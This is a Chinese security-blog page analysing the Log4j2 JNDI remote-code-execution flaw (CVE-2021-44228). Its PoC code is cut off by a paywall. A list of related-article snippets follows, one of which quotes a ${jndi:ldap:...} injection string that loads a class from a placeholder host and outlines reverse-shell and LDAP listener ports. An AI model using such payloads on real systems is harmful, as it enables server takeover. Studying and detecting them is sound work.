Log4j远程代码执行

原创

已于 2022-03-01 15:58:43 修改 · 1.5k 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#web安全 #渗透测试 #网络安全

于 2022-02-25 14:36:03 首次发布

本文深入分析了Log4j的远程代码执行漏洞，探讨了漏洞的触发条件，通过查看官方文档和调试过程，揭示了利用JNDI注入实现远程类加载的原理。总结了漏洞的关键在于对`${}`格式化字符串的支持，导致了安全问题。

零基础学黑客，搜索公众号：白帽子左一

作者：掌控安全——holic

0x01、环境

Jdk7u21（随便版本都可以）

影响版本：

Apache Log4j 2.x
org.apache.logging.log4j
log4j-core
2.11.1

Poc

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class test2 {
   
   
    private static Logger LOGGER = LogManager.getLogger();
    public static void ma

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

zkzq

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

大华智能物联综合管理平台 log4j远程代码执行漏洞复现

0xSec

05-11

2537

大华ICC智能物联综合管理平台/evo-apigw/evo-brm/1.2.0/user/is-exist 接口处存在log4j远程代码执行漏洞，未经身份验证的攻击者可以利用此漏洞远程代码执行，进一步构造系统内部利用链可导致服务器失陷。

Log4j远程代码执行漏洞复现尝试

weixin_51194266的博客

06-29

753

log4j漏洞的简单复现

参与评论您还未登录，请先登录后发表或查看评论

log4j2远程代码执行漏洞原理与漏洞复现（基于vulhub，保姆级的详细教程）

热门推荐

Bossfrank的博客

04-14

4万+

本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场，攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能，在{}内使用了了JNDI注入的方式，通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码（.class），最终造成了远程代码执行。

《漏洞研究》Apache Log4j2 远程代码执行漏洞

11-04

2201

Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228)，该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能，未经身份验证的攻击者通过发送特定恶意数据包，可在目标服务器上执行任意代码。

log4j2远程代码执行

2302_79885863的博客

05-26

1206

漏洞，黑客可以恶意构造特殊数据请求包，触发此漏洞，从而成功利用此漏洞可以在目标服务器上执行任意代码。注意，此漏洞是可以执行任意代码，这就很恐怖，相当于黑客已经攻入计算机，可以为所欲为了，就像已经进入你家，想干什么，就干什么，比如运行什么程序，植入什么病毒。通过访问那个域名网站之后，它的这个服务器后面会去做一个映射，如果这个网站存在这个漏洞，那么它就会访问这个网站，只要一访问这个网站它就会得到网站的ip地址，说明我的服务器解析了这个代码，说明那个我的这个网站存在这个漏洞。

log4j 远程执行代码CVE-2021-44228复现

beichenyyds的博客

03-02

4122

0x01 漏洞简述 2021年12月09日，360CERT监测发现Apache Log4j 2存在JNDI远程代码执行，漏洞等级：严重，漏洞评分：10.0。 Apache Log4j 2是一个开源的日志记录组件，使用非常的广泛，使用情况参考： https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages 对此，360CERT建议广大用户尽快将·Apache Log4j 2进行升级，以免遭受黑客攻击。

精选资源

Apache Log4j 远程代码执行漏洞(CVE-2021-44832)

10-25

Apache Log4j 是一个广泛使用的 Java 日志框架，它允许应用...总之，Apache Log4j 远程代码执行漏洞是一个重大安全事件，强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。

精选资源

解决Apache Log4j 远程代码执行漏洞log4j2部分jar

12-10

解决Apache Log4j 远程代码执行漏洞log4j2部分jar，包含log4j-1.2-api-2.15.0.jar，log4j-api-2.15.0.jar，log4j-core-2.15.0.jar，log4j-to-slf4j-2.15.0.jar

精选资源

Apache Log4j2 远程代码执行漏洞检测工具

12-15

针对这个漏洞，开发出了专门的Apache Log4j2远程代码执行漏洞检测工具，这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...

logging-log4j2-log4j-2.15.0-rc2.zip maven 资源库

12-31

针对Log4j 2 远程代码执行漏洞，需要用到的升级资源包，适用于maven资源库，包括log4j，log4j-core，log4j-api，log4j-1.2-api，log4j-jpa等全套2.15.0 maven资源库jar包。如果是maven本地仓库使用，需要将zip包解压到maven资源库的/org/apache/logging/log4j下 log4j严重漏洞 log4j logging-log4j2-log4j-2.15.0-rc2 log4j-1.2-api-2.15.0.jar log4j-api-2.15.0.jar log4j-core-2.15.0.jar log4j-slf4j-impl-2.15.0.jar log4j-web-2.15.0.jar

Log4j远程代码执行漏洞

04-14

972

遇到问题可以先看注意事项！！！

Java代码审计——apache log4j 远程命令执行（CVE-2021-44228）

王嘟嘟的博客

12-13

2252

0x00 前言反序列化总纲本来是快乐游戏时间的，但是突然就出来这个洞了= =，当然这个突然用的比较夸张了，修复时间应该是在五天前了。本着学习的态度来进行一下简单的分析。 0x01 环境首先是pom <dependencies> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>lo

Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)

weixin_44047654的博客

01-09

3641

Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)

p36273的博客

09-16

1707

上面第2、3、4、5步都是在攻击者端操作，只有第6步是在普通前端操作。上面一共开启了3个端口，分别是80、1234、9999。这分别对应的是：web服务、接收反弹shell的、ldap服务。------ Log4j2漏洞总的来说就是：因为Log4j2默认支持解析ldap/rmi协议（只要打印的日志中包括ldap/rmi协议即可），并会通过名称从ldap服务端其获取对应的Class文件，并使用ClassLoader在本地加载Ldap服务端返回的Class类。

Log4j 的远程代码执行漏洞

weilaona的博客

12-17

1167

Log4j 的远程代码执行漏洞 12 月 10 日凌晨，Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开，由于 Log4j 的广泛使用，该漏洞一旦被攻击者利用会造成严重危害。受本次漏洞影响的版本范围为 Apache Log4j 2.x < 2.15.0-rc2，攻击者可以利用此漏洞在目标服务器上执行任意代码，通过 JNDI 来执行 LDAP 协议来注入一些非法的可执行代码。攻击检测（1）可以通过检查日志中是否存在 “jndi:ldap://”、“jndi:rmi” 等字符来发现可能

Apache存在Log4j远程代码执行漏洞，严重危险级别

Mr、温少的博客

12-20

647

Apache存在Log4j远程代码执行漏洞，严重危险级别！文章目录Apache存在Log4j远程代码执行漏洞，严重危险级别！漏洞简述 2021-12-09，近期一个 Apache Log4j 远程代码执行漏洞细节被公开，攻击者利用漏洞可以远程执行代码。如果你的系统日志使用log4j实现，且版本大于 2.0，日志打印内容中包含关键字 ${}，其包含的内容会当做变量来进行替换，导致攻击者可以任意执行命令。（问题出在：1og4j-core.jar）影响范围 Apache Log4j2 是一款优秀的

log4j反序列化远程命令执行以及个人原理理解

weixin_46626737的博客

08-11

498

目录服务是一个特殊的数据库，用来保存描述性的、基于属性的详细信息，支持过滤功能。${jndi:ldap:x.x.x.x/test.class},通过构造的这条恶意函数，发送到log4j，打印到日志中，开始解析{}中的内容，发现是ldap实现的jndi，然后调用lookup。功能去查找x.x.x.x/test.class该文件，然后发现是远程服务器的文件，需要通过codebase去下载该class类，然后下载后，对该class文件进行使用默认的构造器。类似于上一个漏洞的原理。

CVE-2021-44228Log4j2远程代码执行漏洞复现

hcja666的博客

03-12

1161

Log4j2（Log for Java）是apache基金会的一个用于 Java 应用程序的成熟且功能强大的日志记录框架。其作用主要体现在能帮助开发者方便地记录程序运行中的各种信息，如调试信息、业务操作记录、错误信息等，便于快速定位和解决问题，同时也有助于对系统运行状况进行监控和分析。

log4j远程代码执行漏洞

06-01

log4j远程代码执行漏洞是一种安全漏洞，可以允许攻击者远程执行恶意代码。该漏洞影响Apache软件基金会的Java日志库Log4j 2.x版本，并由于其被广泛使用而引起了广泛的关注。攻击者可以通过精心构造的日志消息来触发...